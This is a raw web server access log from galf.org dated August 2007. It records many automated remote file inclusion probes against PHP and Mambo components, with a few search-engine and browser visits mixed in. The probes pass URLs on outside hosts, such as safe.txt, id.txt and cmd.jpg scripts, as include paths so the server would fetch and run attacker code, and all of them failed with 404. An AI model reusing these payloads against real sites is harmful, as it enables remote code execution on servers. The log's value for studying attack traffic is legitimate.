202.228.239.204 - - [19/Aug/2007:17:01:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:01:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:01:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:01:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:07:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:07:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:09:04 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:09:05 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:09:05 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:09:05 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:17:09:44 -0700] "GET /logs/access.log HTTP/1.1" 200 2063 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:09:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:09:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:16:12 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:16:12 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:16:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.228.239.204 - - [19/Aug/2007:17:16:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
38.100.19.10 - - [19/Aug/2007:17:19:25 -0700] "GET /?sid HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
38.100.19.10 - - [19/Aug/2007:17:19:45 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "galf.org"
212.34.252.133 - - [19/Aug/2007:17:22:32 -0700] "GET /logs/access_070625.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [19/Aug/2007:17:23:03 -0700] "GET /logs/access_070702.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
38.98.60.188 - - [19/Aug/2007:17:23:54 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.98.60.188 - - [19/Aug/2007:17:23:54 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.80.130.118 - - [19/Aug/2007:17:24:14 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.172.57.241 - - [19/Aug/2007:17:25:28 -0700] "GET /logs///admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
209.172.57.241 - - [19/Aug/2007:17:25:28 -0700] "GET ///admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
85.214.18.27 - - [19/Aug/2007:17:26:01 -0700] "GET /logs/access.log//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.18.27 - - [19/Aug/2007:17:26:02 -0700] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.18.27 - - [19/Aug/2007:17:26:02 -0700] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.220 - - [19/Aug/2007:17:26:39 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:17:30:37 -0700] "GET /logs/access.log HTTP/1.1" 200 6136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:17:34:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:17:34:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.190.23.66 - - [19/Aug/2007:17:42:22 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.190.23.66 - - [19/Aug/2007:17:42:23 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.106.94.205 - - [19/Aug/2007:17:42:59 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
74.6.23.153 - - [19/Aug/2007:17:43:12 -0700] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
38.98.60.188 - - [19/Aug/2007:17:43:25 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.98.60.188 - - [19/Aug/2007:17:43:25 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.106.94.205 - - [19/Aug/2007:17:43:31 -0700] "GET /labia/ HTTP/1.0" 200 508 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:07 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:07 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:08 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:35 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:36 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:17:44:36 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.181.207.107 - - [19/Aug/2007:17:47:45 -0700] "GET /logs/access.log//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.181.207.107 - - [19/Aug/2007:17:47:46 -0700] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:17:49:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:17:49:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:17:50:18 -0700] "GET /logs/access.log HTTP/1.1" 200 10732 "-" "Googlebot-Image/1.0" "www.galf.org"
190.80.130.118 - - [19/Aug/2007:17:50:32 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:17:53:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.84.4.50 - - [19/Aug/2007:17:53:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:17:54:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:17:54:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
161.58.46.218 - - [19/Aug/2007:17:56:10 -0700] "GET /logs/index.php?go=http://balihackerlink.com/xpl/cmd.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
161.58.46.218 - - [19/Aug/2007:17:56:10 -0700] "GET /index.php?go=http://balihackerlink.com/xpl/cmd.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
200.72.165.52 - - [19/Aug/2007:17:56:33 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.permarius.com/bilder/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.72.165.52 - - [19/Aug/2007:17:56:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.permarius.com/bilder/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.56.66 - - [19/Aug/2007:17:57:51 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [19/Aug/2007:17:57:51 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:17:59:50 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:17:59:50 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:01:49 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:01:49 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:01:50 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:02:21 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:02:22 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:02:22 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:18:02:33 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:18:02:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.10.140.196 - - [19/Aug/2007:18:03:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.140.196 - - [19/Aug/2007:18:03:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:18:05:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:18:05:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:18:06:14 -0700] "GET /logs/access.log HTTP/1.1" 200 16159 "-" "Googlebot-Image/1.0" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:08:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:08:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.10.140.196 - - [19/Aug/2007:18:10:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.140.196 - - [19/Aug/2007:18:10:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.230.144 - - [19/Aug/2007:18:11:14 -0700] "GET /logs/index.php?inc=http://www.jobos.cz/standardy/konzultanti/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
217.160.230.144 - - [19/Aug/2007:18:11:14 -0700] "GET /index.php?inc=http://www.jobos.cz/standardy/konzultanti/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:14 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.109.22.116 - - [19/Aug/2007:18:12:14 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.109.22.116 - - [19/Aug/2007:18:12:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:16 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:17 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:17 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:17 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:28 -0700] "GET /logs/access_070723.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:29 -0700] "GET /logs/access_070723.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.109.22.116 - - [19/Aug/2007:18:12:30 -0700] "GET /logs/access_070723.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:18:14:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.84.4.50 - - [19/Aug/2007:18:14:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.189.137 - - [19/Aug/2007:18:14:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.189.137 - - [19/Aug/2007:18:14:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:18:14:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:18:14:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:18:16:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:18:16:33 -0700] "GET /modules/My_eGallery/index.php?basepath=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.242.211.140 - - [19/Aug/2007:18:18:02 -0700] "GET /logs/access_070716.log//modules/mods_full/photo_album/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.242.211.140 - - [19/Aug/2007:18:18:03 -0700] "GET //modules/mods_full/photo_album/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.242.211.140 - - [19/Aug/2007:18:18:03 -0700] "GET /logs//modules/mods_full/photo_album/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:19:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.168.228.204 - - [19/Aug/2007:18:19:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.242.211.140 - - [19/Aug/2007:18:19:55 -0700] "GET /logs/access_070730.log//modules/mods_full/photo_album/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:18:22:20 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:18:22:20 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.34.252.133 - - [19/Aug/2007:18:23:15 -0700] "GET /logs/access_070625.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.23.79 - - [19/Aug/2007:18:23:20 -0700] "GET /logs/access_070521.log HTTP/1.0" 200 199384 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:18:23:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:18:23:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:23:37 -0700] "GET /logs/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.160.21.98 - - [19/Aug/2007:18:23:37 -0700] "GET /logs/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:23:38 -0700] "GET /includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:23:38 -0700] "GET /includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.34.252.133 - - [19/Aug/2007:18:23:43 -0700] "GET /logs/access_070702.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:18:24:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
